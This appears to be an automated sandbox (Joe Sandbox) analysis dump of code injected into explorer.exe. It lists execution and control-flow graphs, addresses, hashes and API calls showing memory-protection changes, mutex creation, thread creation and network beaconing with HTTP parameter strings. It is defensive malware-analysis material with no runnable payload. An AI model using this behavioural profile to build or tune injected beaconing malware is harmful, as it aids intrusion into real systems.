                                                                                                                                                                          • API String ID: 0-1194432280
                                                                                                                                                                          • Opcode ID: ea342207214798dd2c186a71e2190632107a91178ad59943f3aab0a5f1089aec
                                                                                                                                                                          • Instruction ID: 617c126d1eddb679879334fdc38cea4ce390121ed3ae0ae086de1557373ee174
                                                                                                                                                                          • Opcode Fuzzy Hash: ea342207214798dd2c186a71e2190632107a91178ad59943f3aab0a5f1089aec
                                                                                                                                                                          • Instruction Fuzzy Hash: 07811CB1D002699BDB35CB54CD45BEEB7B8AF08754F1541DAEA19B7280D7305E84CFA0

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:2.3%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:4.7%
                                                                                                                                                                          Total number of Nodes:448
                                                                                                                                                                          Total number of Limit Nodes:16
                                                                                                                                                                          execution_graph 13877 10699aa9 13878 10699aaf 13877->13878 13881 10694212 13878->13881 13880 10699ac7 13882 1069421b 13881->13882 13883 10694237 13881->13883 13882->13883 13884 106940c2 6 API calls 13882->13884 13883->13880 13884->13883 13765 1069322a 13766 1069325e 13765->13766 13767 106928c2 ObtainUserAgentString 13766->13767 13768 1069326b 13767->13768 13574 10698bac 13576 10698bb1 13574->13576 13575 10698bb6 13576->13575 13609 1068eb72 13576->13609 13578 10698c2c 13578->13575 13579 10698c85 13578->13579 13581 10698c69 13578->13581 13582 10698c54 13578->13582 13580 10696ab2 NtProtectVirtualMemory 13579->13580 13583 10698c8d 13580->13583 13585 10698c6e 13581->13585 13586 10698c80 13581->13586 13584 10696ab2 NtProtectVirtualMemory 13582->13584 13645 10690102 13583->13645 13589 10698c5c 13584->13589 13590 10696ab2 NtProtectVirtualMemory 13585->13590 13586->13579 13587 10698c97 13586->13587 13591 10698c9c 13587->13591 13592 10698cbe 13587->13592 13631 1068fee2 13589->13631 13594 10698c76 13590->13594 13613 10696ab2 13591->13613 13592->13575 13596 10698cd9 13592->13596 13597 10698cc7 13592->13597 13637 1068ffc2 13594->13637 13596->13575 13601 10696ab2 NtProtectVirtualMemory 13596->13601 13598 10696ab2 NtProtectVirtualMemory 13597->13598 13600 10698ccf 13598->13600 13655 106902f2 13600->13655 13604 10698ce5 13601->13604 13673 10690712 13604->13673 13611 1068eb93 13609->13611 13610 1068ecce 13610->13578 13611->13610 13612 1068ecb5 CreateMutexExW 13611->13612 13612->13610 13615 10696adf 13613->13615 13614 10696ebc 13623 1068fde2 13614->13623 13615->13614 13685 1068c8f2 13615->13685 13617 10696e5c 13618 1068c8f2 NtProtectVirtualMemory 13617->13618 13619 10696e7c 13618->13619 13620 1068c8f2 NtProtectVirtualMemory 13619->13620 13621 10696e9c 13620->13621 13622 1068c8f2 NtProtectVirtualMemory 13621->13622 13622->13614 13624 1068fdf0 13623->13624 13626 1068fecd 13624->13626 13710 10693382 13624->13710 13627 1068c412 13626->13627 13629 1068c440 13627->13629 13628 1068c473 13628->13575 13629->13628 13630 1068c44d CreateThread 13629->13630 13630->13575 13633 1068ff06 13631->13633 13632 1068ffa4 13632->13575 13633->13632 13634 1068c8f2 NtProtectVirtualMemory 13633->13634 13635 1068ff9c 13634->13635 13636 10693382 ObtainUserAgentString 13635->13636 13636->13632 13639 10690016 13637->13639 13638 106900f0 13638->13575 13639->13638 13642 106900bb 13639->13642 13643 1068c8f2 NtProtectVirtualMemory 13639->13643 13640 106900e8 13641 10693382 ObtainUserAgentString 13640->13641 13641->13638 13642->13640 13644 1068c8f2 NtProtectVirtualMemory 13642->13644 13643->13642 13644->13640 13647 10690137 13645->13647 13646 106902d5 13646->13575 13647->13646 13648 1068c8f2 NtProtectVirtualMemory 13647->13648 13649 1069028a 13648->13649 13650 1068c8f2 NtProtectVirtualMemory 13649->13650 13653 106902a9 13650->13653 13651 106902cd 13652 10693382 ObtainUserAgentString 13651->13652 13652->13646 13653->13651 13654 1068c8f2 NtProtectVirtualMemory 13653->13654 13654->13651 13658 10690349 13655->13658 13656 1069049f 13657 1068c8f2 NtProtectVirtualMemory 13656->13657 13662 106904c3 13656->13662 13657->13662 13658->13656 13659 1068c8f2 NtProtectVirtualMemory 13658->13659 13660 10690480 13659->13660 13661 1068c8f2 NtProtectVirtualMemory 13660->13661 13661->13656 13663 1068c8f2 NtProtectVirtualMemory 13662->13663 13664 10690597 13662->13664 13663->13664 13665 1068c8f2 NtProtectVirtualMemory 13664->13665 13667 106905bf 13664->13667 13665->13667 13666 106906e1 13668 10693382 ObtainUserAgentString 13666->13668 13670 1068c8f2 NtProtectVirtualMemory 13667->13670 13671 106906b9 13667->13671 13669 106906e9 13668->13669 13669->13575 13670->13671 13671->13666 13672 1068c8f2 NtProtectVirtualMemory 13671->13672 13672->13666 13674 10690767 13673->13674 13675 1068c8f2 NtProtectVirtualMemory 13674->13675 13680 10690903 13674->13680 13676 106908e3 13675->13676 13677 1068c8f2 NtProtectVirtualMemory 13676->13677 13677->13680 13678 10690992 13679 106909b7 13678->13679 13684 1068c8f2 NtProtectVirtualMemory 13678->13684 13681 10693382 ObtainUserAgentString 13679->13681 13680->13678 13682 1068c8f2 NtProtectVirtualMemory 13680->13682 13683 106909bf 13681->13683 13682->13678 13683->13575 13684->13679 13686 1068c987 13685->13686 13689 1068c9b2 13686->13689 13700 1068d622 13686->13700 13688 1068cc0c 13688->13617 13689->13688 13690 1068cba2 13689->13690 13692 1068cac5 13689->13692 13691 10698e12 NtProtectVirtualMemory 13690->13691 13699 1068cb5b 13691->13699 13704 10698e12 13692->13704 13694 10698e12 NtProtectVirtualMemory 13694->13688 13695 1068cae3 13695->13688 13696 1068cb3d 13695->13696 13697 10698e12 NtProtectVirtualMemory 13695->13697 13698 10698e12 NtProtectVirtualMemory 13696->13698 13697->13696 13698->13699 13699->13688 13699->13694 13702 1068d67a 13700->13702 13701 1068d67e 13701->13689 13702->13701 13703 10698e12 NtProtectVirtualMemory 13702->13703 13703->13702 13705 10698e45 NtProtectVirtualMemory 13704->13705 13708 10697942 13704->13708 13707 10698e70 13705->13707 13707->13695 13709 10697967 13708->13709 13709->13705 13711 106933c7 13710->13711 13714 10693232 13711->13714 13713 10693438 13713->13626 13713->13713 13715 1069325e 13714->13715 13718 106928c2 13715->13718 13717 1069326b 13717->13713 13720 10692934 13718->13720 13719 106929a6 13719->13717 13720->13719 13721 10692995 ObtainUserAgentString 13720->13721 13721->13719 13769 1068d42e 13770 1068d45b 13769->13770 13777 1068d4c9 13769->13777 13771 10697232 NtCreateFile 13770->13771 13770->13777 13772 1068d496 13771->13772 13773 1068d082 NtCreateFile 13772->13773 13778 1068d4c5 13772->13778 13775 1068d4b6 13773->13775 13774 10697232 NtCreateFile 13774->13777 13776 1068cf52 NtCreateFile 13775->13776 13775->13778 13776->13778 13778->13774 13778->13777 13929 1069472e 13930 10694788 connect 13929->13930 13931 1069476a 13929->13931 13931->13930 13801 10691ce2 13803 10691dd9 13801->13803 13802 10692022 13803->13802 13807 10691352 13803->13807 13805 10691f0d 13805->13802 13816 10691792 13805->13816 13808 1069139e 13807->13808 13809 106914ec 13808->13809 13810 1069158e 13808->13810 13812 10691595 13808->13812 13811 10697232 NtCreateFile 13809->13811 13810->13805 13814 106914ff 13811->13814 13812->13810 13813 10697232 NtCreateFile 13812->13813 13813->13810 13814->13810 13815 10697232 NtCreateFile 13814->13815 13815->13810 13817 106917e0 13816->13817 13818 10697232 NtCreateFile 13817->13818 13821 1069190c 13818->13821 13819 10691af3 13819->13805 13820 10691352 NtCreateFile 13820->13821 13821->13819 13821->13820 13822 10691602 NtCreateFile 13821->13822 13822->13821 13823 106942e4 13824 1069436f 13823->13824 13825 10694305 13823->13825 13825->13824 13827 106940c2 13825->13827 13828 106941f0 13827->13828 13829 106940cb 13827->13829 13828->13824 13829->13828 13830 10697f82 6 API calls 13829->13830 13830->13828 13893 1068eb66 13894 1068eb6a 13893->13894 13895 1068ecce 13894->13895 13896 1068ecb5 CreateMutexExW 13894->13896 13896->13895 13885 106940b9 13886 106941f0 13885->13886 13887 106940ed 13885->13887 13887->13886 13888 10697f82 6 API calls 13887->13888 13888->13886 13831 106900fb 13833 10690137 13831->13833 13832 106902d5 13833->13832 13834 1068c8f2 NtProtectVirtualMemory 13833->13834 13835 1069028a 13834->13835 13836 1068c8f2 NtProtectVirtualMemory 13835->13836 13839 106902a9 13836->13839 13837 106902cd 13838 10693382 ObtainUserAgentString 13837->13838 13838->13832 13839->13837 13840 1068c8f2 NtProtectVirtualMemory 13839->13840 13840->13837 13779 1069683a 13780 10696841 13779->13780 13781 10697f82 6 API calls 13780->13781 13783 106968c5 13781->13783 13782 10696906 13783->13782 13784 10697232 NtCreateFile 13783->13784 13784->13782 13897 10697f7a 13899 10697fb8 13897->13899 13898 10698022 13899->13898 13900 106945b2 socket 13899->13900 13902 10698081 13899->13902 13900->13902 13901 10698134 13901->13898 13903 10694732 connect 13901->13903 13905 106981b2 13901->13905 13902->13898 13902->13901 13904 10698117 getaddrinfo 13902->13904 13903->13905 13904->13901 13905->13898 13906 106946b2 send 13905->13906 13908 10698729 13906->13908 13907 106987f4 setsockopt recv 13907->13898 13908->13898 13908->13907 13889 106928be 13890 106928c3 13889->13890 13891 10692995 ObtainUserAgentString 13890->13891 13892 106929a6 13890->13892 13891->13892 13909 1069337e 13910 106933c7 13909->13910 13911 10693232 ObtainUserAgentString 13910->13911 13912 10693438 13911->13912 13912->13912 13952 1068ffbf 13955 10690016 13952->13955 13953 106900f0 13954 106900e8 13956 10693382 ObtainUserAgentString 13954->13956 13955->13953 13957 106900bb 13955->13957 13958 1068c8f2 NtProtectVirtualMemory 13955->13958 13956->13953 13957->13954 13959 1068c8f2 NtProtectVirtualMemory 13957->13959 13958->13957 13959->13954 13932 106999f1 13933 106999f7 13932->13933 13936 1068e852 13933->13936 13935 10699a0f 13937 1068e8e4 13936->13937 13938 1068e865 13936->13938 13937->13935 13938->13937 13940 1068e887 13938->13940 13942 1068e87e 13938->13942 13939 1069436f 13939->13935 13940->13937 13941 10692662 6 API calls 13940->13941 13941->13937 13942->13939 13943 106940c2 6 API calls 13942->13943 13943->13939 13841 1068c0f1 13842 1068c109 13841->13842 13843 1068c1d3 13841->13843 13844 1068c012 6 API calls 13842->13844 13845 1068c113 13844->13845 13845->13843 13846 10697f82 6 API calls 13845->13846 13846->13843 13944 1068d5f1 13945 1068d60e 13944->13945 13946 1068d606 13944->13946 13947 10692662 6 API calls 13946->13947 13947->13945 13960 106999b3 13961 106999bd 13960->13961 13964 1068e6d2 13961->13964 13963 106999e0 13965 1068e704 13964->13965 13966 1068e6f7 13964->13966 13968 1068e72d 13965->13968 13970 1068e737 13965->13970 13972 1068e6ff 13965->13972 13967 1068c0f2 6 API calls 13966->13967 13967->13972 13973 106942c2 13968->13973 13971 10697f82 6 API calls 13970->13971 13970->13972 13971->13972 13972->13963 13974 106942df 13973->13974 13975 106942cb 13973->13975 13974->13972 13975->13974 13976 106940c2 6 API calls 13975->13976 13976->13974 13722 10697232 13724 1069725c 13722->13724 13725 10697334 13722->13725 13723 10697410 NtCreateFile 13723->13725 13724->13723 13724->13725 13847 106902f4 13848 10690349 13847->13848 13849 1069049f 13848->13849 13851 1068c8f2 NtProtectVirtualMemory 13848->13851 13850 1068c8f2 NtProtectVirtualMemory 13849->13850 13854 106904c3 13849->13854 13850->13854 13852 10690480 13851->13852 13853 1068c8f2 NtProtectVirtualMemory 13852->13853 13853->13849 13855 1068c8f2 NtProtectVirtualMemory 13854->13855 13856 10690597 13854->13856 13855->13856 13857 1068c8f2 NtProtectVirtualMemory 13856->13857 13859 106905bf 13856->13859 13857->13859 13858 106906e1 13860 10693382 ObtainUserAgentString 13858->13860 13862 1068c8f2 NtProtectVirtualMemory 13859->13862 13863 106906b9 13859->13863 13861 106906e9 13860->13861 13862->13863 13863->13858 13864 1068c8f2 NtProtectVirtualMemory 13863->13864 13864->13858 13785 10698e0a 13786 10697942 13785->13786 13787 10698e45 NtProtectVirtualMemory 13786->13787 13788 10698e70 13787->13788 13913 1069114a 13914 10691153 13913->13914 13919 10691174 13913->13919 13915 10693382 ObtainUserAgentString 13914->13915 13917 1069116c 13915->13917 13916 106911e7 13918 1068c0f2 6 API calls 13917->13918 13918->13919 13919->13916 13921 1068c1f2 13919->13921 13922 1068c20f 13921->13922 13926 1068c2c9 13921->13926 13923 10696f12 7 API calls 13922->13923 13925 1068c242 13922->13925 13923->13925 13924 1068c289 13924->13926 13928 1068c0f2 6 API calls 13924->13928 13925->13924 13927 1068d432 NtCreateFile 13925->13927 13926->13919 13927->13924 13928->13926 13746 10699a4d 13747 10699a53 13746->13747 13750 1068d782 13747->13750 13749 10699a6b 13752 1068d78f 13750->13752 13751 1068d7ad 13751->13749 13752->13751 13754 10692662 13752->13754 13755 1069266b 13754->13755 13763 106927ba 13754->13763 13756 1068c0f2 6 API calls 13755->13756 13755->13763 13758 106926ee 13756->13758 13757 10692750 13760 1069283f 13757->13760 13762 10692791 13757->13762 13757->13763 13758->13757 13759 10697f82 6 API calls 13758->13759 13759->13757 13761 10697f82 6 API calls 13760->13761 13760->13763 13761->13763 13762->13763 13764 10697f82 6 API calls 13762->13764 13763->13751 13764->13763 13734 10697f82 13736 10697fb8 13734->13736 13735 10698022 13736->13735 13737 106945b2 socket 13736->13737 13739 10698081 13736->13739 13737->13739 13738 10698134 13738->13735 13740 10694732 connect 13738->13740 13742 106981b2 13738->13742 13739->13735 13739->13738 13741 10698117 getaddrinfo 13739->13741 13740->13742 13741->13738 13742->13735 13743 106946b2 send 13742->13743 13745 10698729 13743->13745 13744 106987f4 setsockopt recv 13744->13735 13745->13735 13745->13744 13948 1068fdd9 13949 1068fdf0 13948->13949 13950 10693382 ObtainUserAgentString 13949->13950 13951 1068fecd 13949->13951 13950->13951 13483 1068c2dd 13486 1068c31a 13483->13486 13484 1068c3fa 13485 1068c328 SleepEx 13485->13485 13485->13486 13486->13484 13486->13485 13490 10696f12 13486->13490 13499 1068d432 13486->13499 13509 1068c0f2 13486->13509 13496 10696f48 13490->13496 13491 10697134 13491->13486 13492 106970e9 13494 10697125 13492->13494 13527 10696842 13492->13527 13535 10696922 13494->13535 13496->13491 13496->13492 13498 10697232 NtCreateFile 13496->13498 13515 10697f82 13496->13515 13498->13496 13500 1068d45b 13499->13500 13508 1068d4c9 13499->13508 13501 10697232 NtCreateFile 13500->13501 13500->13508 13502 1068d496 13501->13502 13503 1068d4c5 13502->13503 13556 1068d082 13502->13556 13505 10697232 NtCreateFile 13503->13505 13503->13508 13505->13508 13506 1068d4b6 13506->13503 13565 1068cf52 13506->13565 13508->13486 13510 1068c109 13509->13510 13511 1068c1d3 13509->13511 13570 1068c012 13510->13570 13511->13486 13513 1068c113 13513->13511 13514 10697f82 6 API calls 13513->13514 13514->13511 13517 10697fb8 13515->13517 13516 10698022 13516->13496 13517->13516 13520 10698081 13517->13520 13543 106945b2 13517->13543 13519 10698134 13519->13516 13523 106981b2 13519->13523 13546 10694732 13519->13546 13520->13516 13520->13519 13522 10698117 getaddrinfo 13520->13522 13522->13519 13523->13516 13549 106946b2 13523->13549 13525 106987f4 setsockopt recv 13525->13516 13526 10698729 13526->13516 13526->13525 13528 1069686d 13527->13528 13552 10697232 13528->13552 13530 10696906 13530->13492 13531 10696888 13531->13530 13532 10697f82 6 API calls 13531->13532 13533 106968c5 13531->13533 13532->13533 13533->13530 13534 10697232 NtCreateFile 13533->13534 13534->13530 13536 106969c2 13535->13536 13537 10697232 NtCreateFile 13536->13537 13540 106969d6 13537->13540 13538 10696a9f 13538->13491 13539 10696a5d 13539->13538 13541 10697232 NtCreateFile 13539->13541 13540->13538 13540->13539 13542 10697f82 6 API calls 13540->13542 13541->13538 13542->13539 13544 1069460a socket 13543->13544 13545 106945ec 13543->13545 13544->13520 13545->13544 13547 10694788 connect 13546->13547 13548 1069476a 13546->13548 13547->13523 13548->13547 13550 10694705 send 13549->13550 13551 106946e7 13549->13551 13550->13526 13551->13550 13554 1069725c 13552->13554 13555 10697334 13552->13555 13553 10697410 NtCreateFile 13553->13555 13554->13553 13554->13555 13555->13531 13557 1068d420 13556->13557 13558 1068d0aa 13556->13558 13557->13506 13558->13557 13559 10697232 NtCreateFile 13558->13559 13561 1068d1f9 13559->13561 13560 1068d3df 13560->13506 13561->13560 13562 10697232 NtCreateFile 13561->13562 13563 1068d3c9 13562->13563 13564 10697232 NtCreateFile 13563->13564 13564->13560 13566 1068cf70 13565->13566 13567 1068cf84 13565->13567 13566->13503 13568 10697232 NtCreateFile 13567->13568 13569 1068d046 13568->13569 13569->13503 13572 1068c031 13570->13572 13571 1068c0cd 13571->13513 13572->13571 13573 10697f82 6 API calls 13572->13573 13573->13571 13865 1068fedd 13867 1068ff06 13865->13867 13866 1068ffa4 13867->13866 13868 1068c8f2 NtProtectVirtualMemory 13867->13868 13869 1068ff9c 13868->13869 13870 10693382 ObtainUserAgentString 13869->13870 13870->13866 13789 10699a1f 13790 10699a25 13789->13790 13793 1068d5f2 13790->13793 13792 10699a3d 13794 1068d5fb 13793->13794 13795 1068d60e 13793->13795 13794->13795 13796 10692662 6 API calls 13794->13796 13795->13792 13796->13795 13726 10698e12 13727 10698e45 NtProtectVirtualMemory 13726->13727 13728 10697942 13726->13728 13729 10698e70 13727->13729 13728->13727 13797 1068d613 13799 1068d620 13797->13799 13798 1068d67e 13799->13798 13800 10698e12 NtProtectVirtualMemory 13799->13800 13800->13799 13871 10691cd4 13873 10691cd8 13871->13873 13872 10692022 13873->13872 13874 10691352 NtCreateFile 13873->13874 13875 10691f0d 13874->13875 13875->13872 13876 10691792 NtCreateFile 13875->13876 13876->13875

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 10697f82-10697fb6 1 10697fb8-10697fbc 0->1 2 10697fd6-10697fd9 0->2 1->2 3 10697fbe-10697fc2 1->3 4 10697fdf-10697fed 2->4 5 106988fe-1069890c 2->5 3->2 6 10697fc4-10697fc8 3->6 7 10697ff3-10697ff7 4->7 8 106988f6-106988f7 4->8 6->2 9 10697fca-10697fce 6->9 10 10697ff9-10697ffd 7->10 11 10697fff-10698000 7->11 8->5 9->2 12 10697fd0-10697fd4 9->12 10->11 13 1069800a-10698010 10->13 11->13 12->2 12->4 14 1069803a-10698060 13->14 15 10698012-10698020 13->15 17 10698068-1069807c call 106945b2 14->17 18 10698062-10698066 14->18 15->14 16 10698022-10698026 15->16 16->8 20 1069802c-10698035 16->20 22 10698081-106980a2 17->22 18->17 21 106980a8-106980ab 18->21 20->8 23 106980b1-106980b8 21->23 24 10698144-10698150 21->24 22->21 25 106988ee-106988ef 22->25 26 106980ba-106980dc call 10697942 23->26 27 106980e2-106980f5 23->27 24->25 28 10698156-10698165 24->28 25->8 26->27 27->25 30 106980fb-10698101 27->30 31 1069817f-1069818f 28->31 32 10698167-10698178 call 10694552 28->32 30->25 37 10698107-10698109 30->37 34 10698191-106981ad call 10694732 31->34 35 106981e5-1069821b 31->35 32->31 43 106981b2-106981da 34->43 40 1069822d-10698231 35->40 41 1069821d-1069822b 35->41 37->25 42 1069810f-10698111 37->42 45 10698233-10698245 40->45 46 10698247-1069824b 40->46 44 1069827f-10698280 41->44 42->25 47 10698117-10698132 getaddrinfo 42->47 43->35 49 106981dc-106981e1 43->49 48 10698283-106982e0 call 10698d62 call 10695482 call 10694e72 call 10699002 44->48 45->44 50 1069824d-1069825f 46->50 51 10698261-10698265 46->51 47->24 52 10698134-1069813c 47->52 63 106982e2-106982e6 48->63 64 106982f4-10698354 call 10698d92 48->64 49->35 50->44 54 1069826d-10698279 51->54 55 10698267-1069826b 51->55 52->24 54->44 55->48 55->54 63->64 65 106982e8-106982ef call 10695042 63->65 69 1069835a-10698396 call 10698d62 call 10699262 call 10699002 64->69 70 1069848c-106984b8 call 10698d62 call 10699262 64->70 65->64 85 10698398-106983b7 call 10699262 call 10699002 69->85 86 106983bb-106983e9 call 10699262 * 2 69->86 79 106984d9-10698590 call 10699262 * 3 call 10699002 * 2 call 10695482 70->79 80 106984ba-106984d5 70->80 111 10698595-106985b9 call 10699262 79->111 80->79 85->86 100 106983eb-10698410 call 10699002 call 10699262 86->100 101 10698415-1069841d 86->101 100->101 104 1069841f-10698425 101->104 105 10698442-10698448 101->105 108 10698467-10698487 call 10699262 104->108 109 10698427-1069843d 104->109 110 1069844e-10698456 105->110 105->111 108->111 109->111 110->111 116 1069845c-1069845d 110->116 121 106985bb-106985cc call 10699262 call 10699002 111->121 122 106985d1-106986ad call 10699262 * 7 call 10699002 call 10698d62 call 10699002 call 10694e72 call 10695042 111->122 116->108 133 106986af-106986b3 121->133 122->133 135 106986ff-1069872d call 106946b2 133->135 136 106986b5-106986fa call 10694382 call 106947b2 133->136 145 1069875d-10698761 135->145 146 1069872f-10698735 135->146 158 106988e6-106988e7 136->158 147 1069890d-10698913 145->147 148 10698767-1069876b 145->148 146->145 151 10698737-1069874c 146->151 153 10698779-10698784 147->153 154 10698919-10698920 147->154 155 106988aa-106988df call 106947b2 148->155 156 10698771-10698773 148->156 151->145 152 1069874e-10698754 151->152 152->145 159 10698756 152->159 160 10698786-10698793 153->160 161 10698795-10698796 153->161 154->160 155->158 156->153 156->155 158->25 159->145 160->161 164 1069879c-106987a0 160->164 161->164 167 106987b1-106987b2 164->167 168 106987a2-106987af 164->168 170 106987b8-106987c4 167->170 168->167 168->170 173 106987f4-10698861 setsockopt recv 170->173 174 106987c6-106987ef call 10698d92 call 10698d62 170->174 175 106988a3-106988a4 173->175 176 10698863 173->176 174->173 175->155 176->175 179 10698865-1069886a 176->179 179->175 183 1069886c-10698872 179->183 183->175 186 10698874-106988a1 183->186 186->175 186->176
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: getaddrinforecvsetsockopt
                                                                                                                                                                          • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                                                                          • API String ID: 1564272048-1117930895
                                                                                                                                                                          • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                          • Instruction ID: b5685fa864940fc72d4906c00463e93280c547d8bef0f7fc5351e1050b3c15a9
                                                                                                                                                                          • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                          • Instruction Fuzzy Hash: BC529E30618A498FC759EF68C484BEAB7E1FB54300F51462ED4AFCB542DE30B949CB95

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 303 10697232-10697256 304 106978bd-106978cd 303->304 305 1069725c-10697260 303->305 305->304 306 10697266-106972a0 305->306 307 106972bf 306->307 308 106972a2-106972a6 306->308 310 106972c6 307->310 308->307 309 106972a8-106972ac 308->309 311 106972ae-106972b2 309->311 312 106972b4-106972b8 309->312 313 106972cb-106972cf 310->313 311->310 312->313 316 106972ba-106972bd 312->316 314 106972f9-1069730b 313->314 315 106972d1-106972f7 call 10697942 313->315 320 10697378 314->320 321 1069730d-10697332 314->321 315->314 315->320 316->313 324 1069737a-106973a0 320->324 322 106973a1-106973a8 321->322 323 10697334-1069733b 321->323 325 106973aa-106973d3 call 10697942 322->325 326 106973d5-106973dc 322->326 327 1069733d-10697360 call 10697942 323->327 328 10697366-10697370 323->328 325->320 325->326 330 106973de-1069740a call 10697942 326->330 331 10697410-10697458 NtCreateFile call 10697172 326->331 327->328 328->320 333 10697372-10697373 328->333 330->320 330->331 339 1069745d-1069745f 331->339 333->320 339->320 340 10697465-1069746d 339->340 340->320 341 10697473-10697476 340->341 342 10697478-10697481 341->342 343 10697486-1069748d 341->343 342->324 344 1069748f-106974b8 call 10697942 343->344 345 106974c2-106974ec 343->345 344->320 350 106974be-106974bf 344->350 351 106978ae-106978b8 345->351 352 106974f2-106974f5 345->352 350->345 351->320 353 106974fb-106974fe 352->353 354 10697604-10697611 352->354 355 1069755e-10697561 353->355 356 10697500-10697507 353->356 354->324 358 10697567-10697572 355->358 359 10697616-10697619 355->359 360 10697509-10697532 call 10697942 356->360 361 10697538-10697559 356->361 363 106975a3-106975a6 358->363 364 10697574-1069759d call 10697942 358->364 366 106976b8-106976bb 359->366 367 1069761f-10697626 359->367 360->320 360->361 368 106975e9-106975fa 361->368 363->320 370 106975ac-106975b6 363->370 364->320 364->363 371 10697739-1069773c 366->371 372 106976bd-106976c4 366->372 374 10697628-10697651 call 10697942 367->374 375 10697657-1069766b call 10698e92 367->375 368->354 370->320 380 106975bc-106975e6 370->380 376 10697742-10697749 371->376 377 106977c4-106977c7 371->377 381 106976f5-10697734 372->381 382 106976c6-106976ef call 10697942 372->382 374->320 374->375 375->320 392 10697671-106976b3 375->392 385 1069774b-10697774 call 10697942 376->385 386 1069777a-106977bf 376->386 377->320 388 106977cd-106977d4 377->388 380->368 396 10697894-106978a9 381->396 382->351 382->381 385->351 385->386 386->396 393 106977fc-10697803 388->393 394 106977d6-106977f6 call 10697942 388->394 392->324 400 1069782b-10697835 393->400 401 10697805-10697825 call 10697942 393->401 394->393 396->324 400->351 403 10697837-1069783e 400->403 401->400 403->351 407 10697840-10697886 403->407 407->396
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                          • String ID: `
                                                                                                                                                                          • API String ID: 823142352-2679148245
                                                                                                                                                                          • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                          • Instruction ID: d251611792239ad4feb0a474914fec8604923cd4f8594a38b919425a7e86fdd6
                                                                                                                                                                          • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                          • Instruction Fuzzy Hash: 32225870A18A099FCB89DF28C4996EEF7E1FB98301F41422EE45ED3650DB34E851DB85

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 447 10698e12-10698e38 448 10698e45-10698e6e NtProtectVirtualMemory 447->448 449 10698e40 call 10697942 447->449 450 10698e7d-10698e8f 448->450 451 10698e70-10698e7c 448->451 449->448
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtProtectVirtualMemory.NTDLL ref: 10698E67
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2706961497-0
                                                                                                                                                                          • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                          • Instruction ID: 594c5af4c45a31ec0e3e02bd2f51ee36ae31b04e9d13fc4168de3c84eb6fd988
                                                                                                                                                                          • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                          • Instruction Fuzzy Hash: E6017134668B884F9788EF6CD48512AB7E4FBDD315F000B3EE99AC7254EB74D5414742

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 452 10698e0a-10698e6e call 10697942 NtProtectVirtualMemory 455 10698e7d-10698e8f 452->455 456 10698e70-10698e7c 452->456
                                                                                                                                                                          APIs
                                                                                                                                                                          • NtProtectVirtualMemory.NTDLL ref: 10698E67
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2706961497-0
                                                                                                                                                                          • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                                          • Instruction ID: 5749486cc187556f908bf1816d2e1c2657bd2483d4e1400de643326f4a3c4993
                                                                                                                                                                          • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                                          • Instruction Fuzzy Hash: 8501A234628B884F8788EB2C94512A6B3E5FBCE314F000B3EE99AC3241DB25D5024782

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
